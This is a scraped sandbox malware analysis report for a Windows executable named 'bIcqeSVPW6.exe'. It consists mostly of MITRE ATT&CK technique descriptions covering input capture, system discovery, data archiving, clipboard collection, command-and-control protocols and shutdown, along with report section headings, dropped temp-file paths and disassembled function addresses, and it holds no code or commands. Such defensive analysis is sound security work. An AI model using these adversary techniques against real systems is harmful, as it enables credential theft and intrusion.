Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report bIcqeSVPW6.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\84--3745Q

C:\Users\user\AppData\Local\Temp\autC43F.tmp

C:\Users\user\AppData\Local\Temp\cunili

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
bIcqeSVPW6.exe

Function 00A3B043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Function 00A13D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowCOMMON

Function 00A2DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Function 00A1406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 00A5FA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238
COMMON

Function 00A5BFA4 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 316
fileCOMMON

Function 00A13F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 00A13742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00A13E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Function 00C763D0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00A149FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Function 00A136B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 00C761B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141
fileCOMMON

Function 00A151AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre